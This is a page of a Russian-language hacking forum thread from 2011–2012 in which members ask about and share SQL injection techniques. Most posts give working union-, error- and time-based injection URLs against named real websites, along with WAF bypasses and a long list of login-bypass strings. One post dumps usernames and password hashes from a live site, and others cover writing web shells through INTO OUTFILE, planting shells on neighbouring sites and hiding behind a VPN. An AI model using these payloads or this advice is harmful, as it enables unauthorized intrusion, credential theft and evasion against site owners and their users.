PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 [77] 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98

Vladislav88
25.12.2011, 08:15
Тогда у меня к тебе 2 вопроса :

1)Как хакеры ломают сайты и даже выкладывают видео со взломом и у них нет проблем?

2) Свой сайт нужно залить на сервер в интернете или достаточно открыть его у себя на компе и для того чтобы испробовать xss на себе у меня на сайте обязан быть javascript?

Действительно не знаю )

Lilo
25.12.2011, 08:20
Vladislav88 said:
Тогда у меня к тебе 2 вопроса :
1)Как хакеры ломают сайты и даже выкладывают видео со взломом и у них нет проблем?
2) Свой сайт нужно залить на сервер в интернете или достаточно открыть его у себя на компе и для того чтобы испробовать xss на себе у меня на сайте обязан быть javascript?
Действительно не знаю )


1)впн

2)localhost

p.s.

екс говорил же не осилит

Vladislav88
25.12.2011, 08:26
А если я буду использовать бесплатный впн то меня тоже не поймают на левых сайтах? Приятней на ком то потренироваться в реале , а не на себе )

Ereee
25.12.2011, 08:41
Vladislav88 said:
Тогда у меня к тебе 2 вопроса :
1)Как хакеры ломают сайты и даже выкладывают видео со взломом и у них нет проблем?
2) Свой сайт нужно залить на сервер в интернете или достаточно открыть его у себя на компе и для того чтобы испробовать xss на себе у меня на сайте обязан быть javascript?
Действительно не знаю )


1) Использует связку для анонимности:

VPN+SSH+Socks+DNS+Proxy+VPSProxy+DoubleVPN+TripleV PN+QuadroVPN осилишь?

2) Скачай Denwer, на компе достаточно. Для тренировки юзай php-скрипт, который вешает куки + имеет поле без всякой фильтрации.

3) А ты думай, что бесплатный VPN предоставляет милиция. Все вопросы отпадут

Vladislav88
25.12.2011, 08:44
Ну и гипер связка . Такое наверное только со временем. Я не думал даже что для левых сайтов надо так шифроваться.

Тогда буду на своем сайте тренироваться. Спасибо всем за помощь.

Expl0ited
25.12.2011, 08:45
Vladislav88, учится нужно локально.

Если же хочешь приступить к боевой практике, на форуме куча статей и тем про анонимность.

Данная тема посвящена вопросам про УЯЗВИМОСТИ, а не собственную БЕЗОПАСНОСТЬ. Вопрос закрыт!

GC0mmander
25.12.2011, 23:56
такой вопрос, возможно ли через sql инъекцию изменить хэш админа vbulletin?

поскольку используется salt, не понятно, будет ли внесенный мной пароль верным при авторизации.

Gorev
25.12.2011, 23:58
GC0mmander said:
такой вопрос, возможно ли через sql инъекцию изменить хэш админа vbulletin?
поскольку используется salt, не понятно, будет ли внесенный мной пароль верным при авторизации.


нет нельзя..если бы было можно тогда раздел по бруту хешей не нужен был бы..заменял бы своим и все..и если собрался менять хеш то и соль ставь туда ...

winstrool
26.12.2011, 00:43
GC0mmander said:
такой вопрос, возможно ли через sql инъекцию изменить хэш админа vbulletin?
поскольку используется salt, не понятно, будет ли внесенный мной пароль верным при авторизации.


Можно, если есть соотвецтвующие права на изминения данных в бд через update

Lilo
26.12.2011, 01:31
получил доступ к сайту от админа,через сайт залил шелл, "ваш файл успешно загружен"

блин теперь не могу найти шелл((

Konqi
26.12.2011, 01:35
winstrool said:
Можно, если есть соотвецтвующие права на изминения данных в бд через update


допустим есть права, как сменишь хеш если там иньекция в селект запросе?

KolosJey
26.12.2011, 01:40
winstrool said:
Можно, если есть соотвецтвующие права на изминения данных в бд через update


Права чего, права кого, права куда? )

В селект запросе на мускуле это сделать невозможно (а булки стоят на мускуле)

В апдейт запросе не нужны никакие "права", если скрипт что-то апдейтит, то права у него есть, разумеется

НО Скрипт должен апдейтить в базу юзеов булки, что-бы была возможность изменить там что-то + скуль должна быть довольно специфической что-бы удалось сменить хеш. Скрипты самой булки таких багов не имеют, сомневаюсь что есть какие то модули, которые имеют такие баги.

Тоесть должен быть какой-то кривой самописный скрипт, работающий с таблицей юзеров, и имеющий скуль в апдейте + куча условий, что невероятно, или скрипт имеющий скуль в апдейте в tbl_name, что ещё менее вероятно.

Тоесть ответ - нет, с вероятностью 99.99%

M_script
26.12.2011, 01:46
Konqi said:
как сменишь хеш если там иньекция в селект запросе


Про селект ты сам придумал. В вопросе такого не было.

KolosJey, а в инсерте?

KolosJey
26.12.2011, 01:50
M_script said:
KolosJey
, а в инсерте?


Ровно тоже самое что и в апдейте. Так что врядли )

Konqi
26.12.2011, 02:09
M_script said:
Про селект ты сам придумал. В вопросе такого не было.


большинство людей под SQL injection подразумевают SQLi именно в select запросе, чтобы не заблуждать человека задающего вопрос нужно было добавить что данный способ работает только в апдейт запросах

vaddd
26.12.2011, 16:21
http://www.admgor.nnov.ru/script/show_news.php?doc_id=12345

как такое крутить? дальше and 1=2, не ушел...

Gorev
26.12.2011, 16:29
vaddd said:
http://www.admgor.nnov.ru/script/show_news.php?doc_id=12345
как такое крутить? дальше and 1=2, не ушел...


/threadedpost1826253.html

не ибейс , но синтаксис похож..почитай..может пригодится

vaddd
26.12.2011, 16:35
Gorev said:
/threadedpost1826253.html
не ибейс , но синтаксис похож..почитай..может пригодится


order by чета не работает ((( вроде же айбэйс, ошибки характерные присутствуют

qaz
26.12.2011, 18:21
хелп, чёт никак не могу разкрутить


PHP:
http://titancup.ru/user/?id=11+union+select+1--+

Konqi
26.12.2011, 18:27
qaz said:
хелп, чёт никак не могу разкрутить

PHP:
http://titancup.ru/user/?id=11+union+select+1--+





http://titancup.ru/user/?id=11+or+(1,1)=(select+count(0),concat((select+ve rsion()+from+information_schema.tables+limit+0,1), floor(rand(0)*2))from(information_schema.tables)+g roup+by+2)--+

стандартный метод не пробовал, но error based катит

Boolean
26.12.2011, 18:30
qaz said:
хелп, чёт никак не могу разкрутить

PHP:
http://titancup.ru/user/?id=11+union+select+1--+







Code:
http://titancup.ru/user/?id=11+and%28select+1+from%28select+count%28*%29,c oncat%28%28select+user%28%29%29,floor%28rand%280%2 9*2%29%29x+from+information_schema.tables+group+by +x%29a%29--1


upd: Konqi опередил)

Lilo
26.12.2011, 18:38
qaz said:
хелп, чёт никак не могу разкрутить

PHP:
http://titancup.ru/user/?id=11+union+select+1--+





ts_manager_users

Daven:b7838c7f83d8197f3e46b5d88e3d5a6c

White:0d9198487f4ad5fb4407ee44b84df42c

demiurg:c16bb5217e34563e2eb9af2d9edabb6c

помойму админы

бле

опередили

JorryGo
27.12.2011, 15:44
Приветствую.

В кое какой форме авторизации ввожу кавычку и мне выдаются следующие ошибки.

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 12

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 87

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 88

Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 100

Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 101

Это является sql иньекцией? И можно что-то с этим сделать?

t3cHn0iD
27.12.2011, 15:59
JorryGo said:
Приветствую.
В кое какой форме авторизации ввожу кавычку и мне выдаются следующие ошибки.
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 12
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 87
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 88
Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 100
Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 101
Это является sql иньекцией? И можно что-то с этим сделать?


Пробуй обойти авторизацию так:

admin' --

admin' #

admin'/*

' or ''='

' or 'x'='x

" or "x"="x

') or ('x'='x

0 or 1=1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 1=1--

" or 1=1--

' or '1'='1'--

"' or 1 --'"

or 1=1--

or%201=1

or%201=1 --

' or 1=1 or ''='

" or 1=1 or ""="

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

'hi' or 'x'='x';

' or 1=1--

' or 1=1#

' or 1=1/*

') or '1'='1--

') or ('1'='1--

' or username like '%

' or uname like '%

' or userid like '%

' or uid like '%

' or user like '%

' or 1=1 or ''='

' or ''='

x' or 1=1 or 'x'='y

trololoman96
27.12.2011, 19:42
Есть такой кусок кода


PHP:
// Check IP From IP Logging Database

$get_voted_aids=$wpdb->get_col("SELECT pollip_aid FROM$wpdb->pollsipWHERE pollip_qid =$poll_idAND pollip_ip = '".get_ipaddress()."'$log_expiry_sql");



в функции get_ipaddress() есть возможность подставить свои данные вместо ip, однако вконце все это дело обрабатывается функцией esc_attr() (подробней тут http://wp-kama.ru/function/esc_attr), она преобразует знаки в html сущности: & " ', может есть все же какой вариант выйти из запроса и провести sql inj, или я опять в пролете ?

ne0k
27.12.2011, 21:37
Уважаемые гуру,

Есть код, где _GET, _POST и _COOKIE "фильтруются" так:


PHP:
$_POST=security($_POST);

$_GET=security($_GET);

$_COOKIE=security($_COOKIE);




Функция сукурити:


PHP:
functionsecurity($value)

{

if (is_array($value)) {

$value=array_map('security',$value);

}else{

if(!get_magic_quotes_gpc() ) {

$value=htmlspecialchars($value,ENT_QUOTES,'UTF-8');

}else{

$value=htmlspecialchars(stripslashes($value),ENT_Q UOTES,'UTF-8');

}

$value=str_replace("\\","\\\\",$value);

}

return$value;

}



htmlspecialchars() и stripslashes() не выход жэ, чтобы защититься от SQLi ? Можно ли эксплуатировать?

Еще интересна функция array_map(), кажется мне, пахнет код экзекушн, не ?

trololoman96
27.12.2011, 22:02
htmlspecialchars() и stripslashes() не выход жэ, чтобы защититься от SQLi ? Можно ли эксплуатировать?


Можно только если данные в запросе не будут браться в кавычки, т.е. что то типа такого


PHP:
$get="SELECT * FROM `test` WHERE `id`=$id";



Потому что htmlspecialchars() будет избавляться от кавычек, из запроса в таком случае не выйдешь, а stripslashes() будет разбираться со слешем с помощью которого можно было бы провести фрагментированную SQL inj при подходящих условиях.

По поводу array_map(), то тут вроде как нет выполнения, калл бэк функция уже определена по умолчанию, сменить нельзя

er9j6@
27.12.2011, 23:20
Sql-inj такого типа раскучиваются или они не поддаются?

_http://www.afr.ru/region/303'/ob/

Ereee
28.12.2011, 12:19
er9j6@ said:
Sql-inj такого типа раскучиваются или они не поддаются?
_http://www.afr.ru/region/303'/ob/


Скобки юзай:

http://www.afr.ru/region/(303)and(1)=(0) false

http://www.afr.ru/region/(303)and(1)=(1) true

er9j6@
28.12.2011, 13:58
Ereee said:
Скобки юзай:
http://www.afr.ru/region/(303)and(1)=(0) false
http://www.afr.ru/region/(303)and(1)=(1) true


Это я тоже знаю.

и, дальше как?

Ereee
28.12.2011, 13:59
er9j6@ said:
Это я тоже знаю.
и, дальше как?


http://www.afr.ru/region/(303)and(1)=(1)union(select(1),2,3)#

и т.д.

er9j6@
28.12.2011, 14:04
Ereee said:
http://www.afr.ru/region/(303)and(1)=(1)union(select(1),2,3)#
и т.д.


как версию БД тут вывести?

Lilo
28.12.2011, 14:13
er9j6@ said:
как версию БД тут вывести?


@@version

er9j6@
28.12.2011, 14:17
Lilo said:
@@version


http://www.afr.ru/region/(303)and(1)=(0)union(select(@@version),@@version,@ @version)#

Не могу найти вывод.

Ereee
28.12.2011, 14:22
er9j6@ said:
http://www.afr.ru/region/(303)and(1)=(0)union(select(@@version),@@version,@ @version)#
Не могу найти вывод.


Блин... Сначал найди кол-во:

http://www.afr.ru/region/(303)and(1)=(0)union(select(1),2,3)#

http://www.afr.ru/region/(303)and(1)=(0)union(select(1),2,3,4)#

и т.д. пока не исчезнет ошибка...

p3d
28.12.2011, 17:09
1 and extractvalue(rand(),concat(0x3a,(select concat(char(58),user_id,char(58),username,char(58) ,user_password) from phpbb_users limit 1001,1)))--

подскажите прогу чтоб сдампить таблицу, стоит форум phpbb

stepashka_
28.12.2011, 17:12
p3d said:
1 and extractvalue(rand(),concat(0x3a,(select concat(char(58),user_id,char(58),username,char(58) ,user_password) from phpbb_users limit 1001,1)))--
подскажите прогу чтоб сдампить таблицу, стоит форум phpbb


https://rdot.org/forum/showthread.php?t=519

p3d
28.12.2011, 17:29
там окончание лимит нужно, а тут скобки

stepashka_
28.12.2011, 17:36
p3d said:
там окончание лимит нужно, а тут скобки


https://rdot.org/forum/showthread.php?t=1142 попробуй этим.

Ereee
28.12.2011, 18:22
p3d said:
там окончание лимит нужно, а тут скобки


Не надо, там новая версия лежить, с новыми возможностями!

lightangel
29.12.2011, 20:44
Code:
http://ogra.org.pk/cats_disp.php?cat=-172

It has 8 order by.

I cannot get tables.

It's WAF and I've tried all my WAF skills.

smirk
29.12.2011, 21:33
lightangel said:

Code:
http://ogra.org.pk/cats_disp.php?cat=-172

It has 8 order by.
I cannot get tables.
It's WAF and I've tried all my WAF skills.


http://ogra.org.pk//cats_disp.php?cat=-20+/*!union*/+select+1,2,3,4,5,version(),7,8--+

lightangel
29.12.2011, 23:25
Sorry, I mean tables and not the version.

I already had the version.

Konqi
29.12.2011, 23:37
http://ogra.org.pk//cats_disp.php?cat=-20+/*!union*/+select+1,2,3,4,5,/*!table_name*/,7,8/**//*!from*//**/information_schema.%60tables%60--+

=\

shadowrun
30.12.2011, 00:27
http://www.traktora.com.ua/subcat.php?sort=1

Можно что-то выжать?

d1v
30.12.2011, 00:44
shadowrun said:
http://www.traktora.com.ua/subcat.php?sort=1
Можно что-то выжать?


можно, но из другого скрипта:

http://www.traktora.com.ua/catalog.php?cat=-2+union+select+version()--

shadowrun
30.12.2011, 00:46
d1v said:
можно, но из другого скрипта:
http://www.traktora.com.ua/catalog.php?cat=-2+union+select+version()--


Спасибо!

jangle
30.12.2011, 11:07
MSSQL INJ


-12+union+select+@@version--


дает ответ


Microsoft SQL Native Client error '80040e14'
The ntext data type cannot be selected as DISTINCT because it is not comparable.


Возможно ли обойти DISTINCT в инъекции путем конверта или еще как то?

Спасибо

Ereee
30.12.2011, 11:26
jangle said:
MSSQL INJ
дает ответ
Возможно ли обойти
DISTINCT
в инъекции путем конверта или еще как то?
Спасибо


Select DISTINCT cast (Your Col Name as NVARCHAR(MAX))

DyukiN
30.12.2011, 11:29
залил шелл на один сайт, потом решил залить на соседние сайты, все норм задивается но файл не находит, другие файлы с этой директории читает кроме моих, как можно решить проблему?

Ereee
30.12.2011, 12:05
DyukiN said:
залил шелл на один сайт, потом решил залить на соседние сайты, все норм задивается но файл не находит, другие файлы с этой директории читает кроме моих, как можно решить проблему?


Возможно сайты на другом сервере. Т.е. у тебя остались старые версии сайтов. Попробуй сделать что-то типа 123.txt, если не находит, то возможно я прав.

DyukiN
30.12.2011, 12:11
заливал txt, gif, jpg ниче не открывает(( хотя файлы править могу)

Ereee
30.12.2011, 12:25
DyukiN said:
заливал txt, gif, jpg ниче не открывает(( хотя файлы править могу)


Попробуй править уже существующие файлы, добавь например:

Посмотри из веба, если в исходнике есть данная строка, то я хз че сказать

DyukiN
30.12.2011, 13:20
походу у меня остались страые версии сайтов(( что то можно извлечь из этого?

Ereee
30.12.2011, 13:37
DyukiN said:
походу у меня остались страые версии сайтов(( что то можно извлечь из этого?


Пароли админов. Пути к админке, потом можно залить на те сайты шеллы, без всякого хакинга

UPD. Mожет это из-за группы и овнера?

jangle
31.12.2011, 01:13
Ereee said:
Select DISTINCT cast (Your Col Name as NVARCHAR(MAX))


а можно поподробнее на примере


-12+union+select+@@version--


как можно сделать что-бы @@VERSION выводилось?

smirk
31.12.2011, 14:42
http://www.audit-escort.ru/news.php?AE_content_id=-109+union+select+1,2,3,4,concat_ws(0x3a,id_member, member_name,real_name,passwd,email_address),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28+from+smf_members--+

как быть?

trololoman96
31.12.2011, 14:56
Все просто, таблицы smf_members нет в текущей бд, она находиться в другой


Code:
http://www.audit-escort.ru/news.php?AE_content_id=-109+union+select+1,2,3,4,table_schema,6,7,8,%209,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,%20 26,27,28+from+information_schema.tables+where+tabl e_name=0x736d665f6d656d62657273+--+

Ereee
31.12.2011, 17:46
jangle said:
а можно поподробнее на примере
как можно сделать что-бы @@VERSION выводилось?


-12+union+select+CONVERT(nvarchar,@@version)--

не?

qaz
01.01.2012, 23:23
Почему ничего не выводит? пропадает вывод об ошибке и показывает нормально страницу


PHP:
http://www.pitatel.ru/pclass.php?id=19+or+1+group+by+concat((select+conc at_ws(0x3a,name,email,password)+from+batterika_mys ql.p_users+limit+1,1),0x00,floor(rand(0)*2))having +min(0)+or+1--+

Konqi
01.01.2012, 23:26
qaz said:
Почему ничего не выводит? пропадает вывод об ошибке и показывает нормально страницу

PHP:
http://www.pitatel.ru/pclass.php?id=19+or+1+group+by+concat((select+conc at_ws(0x3a,name,email,password)+from+batterika_mys ql.p_users+limit+1,1),0x00,floor(rand(0)*2))having +min(0)+or+1--+



http://www.pitatel.ru/pclass.php?id=19+and+0+union+select+1,2,3,4,count( 0),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23+from+batterika_mysql.p_users--+

таблица пуста

qaz
01.01.2012, 23:50
Konqi said:
http://www.pitatel.ru/pclass.php?id=19+and+0+union+select+1,2,3,4,count( 0),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23+from+batterika_mysql.p_users--+
таблица пуста


ППц

если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???

aydin-ka
01.01.2012, 23:56
qaz said:
ППц
если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???


Обязательно они там должны быть? может это админ такой хитрый.

P.S: а сам редактирует сайт через cpanel (я так думаю)

Ereee
01.01.2012, 23:59
qaz said:
ППц
если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???


Возможно пароль админа хранится в config.php/admin.php/settings.php/etc. Как вариант, возможно, что скрипты для авторизации/регистрации подключены к другой БД. Вообщем сейчас посмотрю...

UPD. Смотрим админку

http://www.pitatel.ru/admin/


Code:
Access denied for user 'batterika'@'localhost' (using password: NO)

Нет коннекта. Смотрим текст:


Code:
C 14 июля 2011 года компания Pitatel вошла в группу компаний "Баттерика"!

Соответственно, сайт заброшен. БД с пассами админки не подключена...

Konqi
02.01.2012, 00:00
qaz said:
ППц
если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???



table_rows в помощь

smirk
02.01.2012, 22:12
http://er-region.ru/about/department/index.php?id=139+and+1=2+union+select+1,2,3,4,5--+

я так понял, тут нет прямого вывода?

Ereee
02.01.2012, 22:29
smirk said:
http://er-region.ru/about/department/index.php?id=139+and+1=2+union+select+1,2,3,4,5--+
я так понял, тут нет прямого вывода?




Code:
http://er-region.ru/about/department/index.php?id=13999999999999.9+and(select+1+from(se lect+count(*),concat((select+table_name+from+infor mation_schema.tables+limit+1,1),floor(rand(0)*2))x +from+information_schema.tables+group+by+x)a)--+f

Все выводится через error-based. Смотрим исходник:


Code:
[Duplicate entry 'COLLATIONS1' for key 'group_key']

---

[R]eD
03.01.2012, 11:01
иньекция в запросе вида

SELECT * FROM `users` WHERE `news_id` = 123 ORDER BY `news_date` [INJECTION]

есть у кого идеи как ее можно раскрутить?

метод что описан в https://forum.antichat.net/thread43966.html не подходит т.к. там иньекция в ORDER BY [INJECTION], в моем случае параметр уже задан...

Ereee
03.01.2012, 11:15
eD"]
[R]eD said:
иньекция в запросе вида
SELECT * FROM `users` WHERE `news_id` = 123 ORDER BY `news_date` [INJECTION]
есть у кого идеи как ее можно раскрутить?
метод что описан в https://forum.antichat.net/thread43966.html не подходит т.к. там иньекция в ORDER BY [INJECTION], в моем случае параметр уже задан...


Error-based, не?

[R]eD
03.01.2012, 11:26
Ereee said:
Error-based, не?


вывод ошибок да, там есть, но иньекция ведь в последних параметрах как там такое провести?

Boolean
03.01.2012, 13:48
eD"]
[R]eD said:
вывод ошибок да, там есть, но иньекция ведь в последних параметрах как там такое провести?


UNION не работает кстати после ORDER BY.

Единственное, что я вижу, что можно попробовать, это


Code:
INTO OUTFILE '/full/path/to/shell.php' LINES TERMINATED BY +''

Но опять же, FILE_PRIV = Y, magic_quotes_gpc = Off

Можно подобрать еще количество колонок, но т.к. UNION работать не будет, то толку мало.

Крутить как-то так:


Code:
, 100


UPD


Code:
SELECT user FROM mysql.user ORDER BY user, sleep(IF(substr(@@version, 1, 1)=4, 1, 0));

SELECT user FROM mysql.user ORDER BY user, sleep(IF(substr(@@version, 1, 1)=5, 1, 0));

Ток если записей много, то лучше юзать LIMIT.

Что-то по типу blind sleep-based sql injection

AlonDelon
03.01.2012, 14:08
можно как нибудь обойти и авторизоваться, если в админку не пускает? логин - пароль есть.

CMS WP


If you are the webmaster of this site make sure that:
* You have uploaded correctly your files to the public_html directory which is the web-root of your account;
* You have not misspelled the URL. Bear in mind that letters are case sensitive and no blank spaces are recommended;
* In case you have applied SEO - SEF URL rewrite rules, make sure you have renamed the htaccess.txt file to .htaccess. If there is already a non-empty .htaccess file, check it and make sure the necessary rules are uncommented.

Ereee
03.01.2012, 14:10
AlonDelon said:
можно как нибудь обойти и авторизоваться, если в админку не пускает? логин - пароль есть.
CMS WP


Инглиш бро. Криво установлено все.

er9j6@
03.01.2012, 15:28
Как вывести версию БД, столкнулся с жесткой фильтрацией и обойти не получается?

_http://1cnews.com/index.php?mode=search&sstring='and(select*from(select(name_const(version (),1)),name_const(version(),1))a)and'

Ereee
03.01.2012, 15:41
er9j6@ said:
Как вывести версию БД, столкнулся с жесткой фильтрацией и обойти не получается?
_http://1cnews.com/index.php?mode=search&sstring='and(select*from(select(name_const(version (),1)),name_const(version(),1))a)and'




Code:
http://1cnews.com/index.php?mode=viewpart&part=-10+and+1=1+/*!uniON*/+select+1,version(),3--+f

В title 5.1.33-log

Вот так бро А то в поиске заморочки с LIKE. Вообщем все гениальное просто

er9j6@
03.01.2012, 15:56
Ereee said:

Code:
http://1cnews.com/index.php?mode=viewpart&part=-10+and+1=1+/*!uniON*/+select+1,version(),3--+f

В title
5.1.33-log
Вот так бро
А то в поиске заморочки с LIKE. Вообщем все гениальное просто


как ты количество полей подобрал, каким запросом?

Ereee
03.01.2012, 16:01
er9j6@ said:
как ты количество полей подобрал, каким запросом?


Тут главное внимательность.

http://1cnews.com/index.php?mode=viewpart&part=10

Делаем запрос:

http://1cnews.com/index.php?mode=viewpart&part=10'

В заголовке исчезает "Events of the branch". Что то тут не так

Проверяем на inj.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1

"Events of the branch" появился. А если:

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=2

Исчез. Соответственно, true и false.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+10--+f

Заголовок исчез.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+3--+f

Пояивлся, соответственно, кол-во 3.

Ну а дальше

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+union+select+1,2,3--+f

403 forbidden

Попробуем убрать union, все выводится, значит фильтрует union. Шифруем union => /*!uniON*/

Пробуем

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+/*!uniON*/+select+1,2,3--+f

Заголовок есть, 10 заменяем на -10. В заголовке видим цифру 2.

P.S. Вообщем контент-based injection

Groove
03.01.2012, 17:48
Есть доступ к бд как залить shell ?

Ereee
03.01.2012, 17:52
Groove said:
Есть доступ к бд как залить shell ?


Сначала посмотри File_priv. Для этого:

http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f

Копируем юзера.

http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f

Если выведет N, то залить не получится. Если Y + mq=off, то:

http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f

После этого шелл будет по адресу site.ltd/dir/file.php

Groove
03.01.2012, 17:56
Ereee said:
Сначала посмотри File_priv. Для этого:
http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f
Копируем юзера.
http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f
Если выведет N, то залить не получится. Если Y + mq=off, то:
http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f
После этого шелл будет по адресу site.ltd/dir/file.php


У меня прямой доступ =) Нут не sql inj ) Захожу через Navicat

Ereee
03.01.2012, 18:27
Groove said:
У меня прямой доступ =) Нут не sql inj ) Захожу через Navicat


Ты про это наверно:


PHP:
select '' into outfile '/path/to/www/dir/file.php'

qaz
04.01.2012, 01:09
народ, подобрал колонки, и проблема возникла из-за редиректа, как быть дальше?


PHP:
http://www.shop-stroitel.ru/catalog/?id=14+or+1=1+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45--+

Cennarios
04.01.2012, 01:13
Вот так быть -> http://www.shop-stroitel.ru/catalog/?id=111114+or+1+group+by+concat%28%20%28select+use r%28%29%29,floor%28rand%280%29*2%29%29%20having%20 min%280%29--+ Называется ERROR BASED, TIME BASED - гугли по этим ключам

qaz
04.01.2012, 01:22
Cennarios said:
Вот так быть -> http://www.shop-stroitel.ru/catalog/?id=111114+or+1+group+by+concat%28%20%28select+use r%28%29%29,floor%28rand%280%29*2%29%29%20having%20 min%280%29--+ Называется ERROR BASED, TIME BASED - гугли по этим ключам


я так пробовал, когда начинаю выводить данне из таблицы


PHP:
http://www.shop-stroitel.ru/catalog/?id=14+or+1+group+by+concat((select+concat_ws(0x3a ,email,password)+from+stroitel.acx_users+limit+$i, 1),0x00,floor(rand(0)*2))having+min(0)+or+1--+

возникает тотже редирект

trololoman96
04.01.2012, 01:23
Тут можно спокойно обойтись и без вывода в ошибке и тем более не заморачиваться с тайм басед методом, там есть вывод в урл


Code:
www.shop-stroitel.ru/catalog/?id=14+union+select+1,version(),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45--+

BLurpi^_^
04.01.2012, 03:22
имею доступ к админке,могу редактировать индексную страницу, пытаюсь вставить туда:

но он появляется в соурсе:

http://rghost.ru/35730570/image.png

и соответственно index.php?a=phpinfo()

не работает, что еще можно попробовать, подскажите пожалуйста товарищи хакеры

Ereee
04.01.2012, 08:14
qaz said:
возникает тотже редирект


На будущее, если что то не выводится или перенаправляет, пробуй в Opere:

Чтобы отключить авторедирект:

Открой уязвимый сайт => MOUSE2 => Настройки для сайта => Интернет(или Сеть, просто у меня EN Opera) => Сними галочку "Включить автоматическое перенаправление"

Чтобы отключить Javascript:

Открой уязвимый сайт => MOUSE2 => Настройки для сайта => Скрипты(Сценарий) => Сними галочку "Включить скрипты(Javascript)"

В Firefox:

Настройки => Дополнительно => Общие => "Предупреждать при попытке сайта перенаправить или перезагрузить страницу"

Еще в твоем случаи mq=on, поэтому не получится через Error-based думаю, так как думаю, что нужно вставить кавычку, дабы вызвать ошибку. Возможно я и не прав.


BLurpi^_^ said:
имею доступ к админке,могу редактировать индексную страницу, пытаюсь вставить туда:

но он появляется в соурсе:
http://rghost.ru/35730570/image.png
и соответственно index.php?a=phpinfo()
не работает, что еще можно попробовать, подскажите пожалуйста товарищи хакеры


Это значит, что не выполняется php(впрочем везде так). Второй вопрос не подробный. Попробуй найти в админке файлменеджеры, аплоадеры и т.д.

[R]eD
04.01.2012, 11:48
Столкнулся с проблемой

есть скуля

&ordtype=name&ord=,sleep(IF(ASCII(substr((select+1+from+user),1, 1))=123,1,0))

проблема в том что скрипт переводит таблицу user в верхний регистр USER и в итоге

Invalid query: Table 'db.USER' doesn't exist

пробывал

&ordtype=тфьу&ord=,sleep(IF(ASCII(substr((set+@@global.lower_cas e_table_names=1),1,1))=123,1,0))

но ошибка

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SET @@GLOBAL.LOWER_CASE_TABLE_NAMES=1),10,1))=48,1,0)) ' at line 9

как можно обойти перевод в верхний регистр или заставить поменять системную переменную?

и еще раз тут есть вывод ошибок то наверное можно выводить через error-based но не выходит(

upd:

с error-based разобрадся. получилось


Code:
&ordtype=name&ord=,(select+1+from+information_schema.tables+grou p+by+concat((select+1),floor(rand(0)*2))+having+mi n(0))

, но так и не могу обойти перевод в верхний регистр(

Ereee
04.01.2012, 12:09
eD"]
[R]eD said:
Но так и не могу обойти перевод в верхний регистр(


unhex(hex()) не? По логике должно сработать.

[R]eD
04.01.2012, 12:12
Ereee said:
unhex(hex()) не? По логике должно сработать.


он переводит имя таблицы в верхний регистр а не сам запрос т.е.

select password from USER

с unhex(hex(user)) такое не прокатит.

вродебы где-то была метод с переводом всего запроса в mysql-hex и его выполнением в подзадпросе, но не могу найти(

Ereee
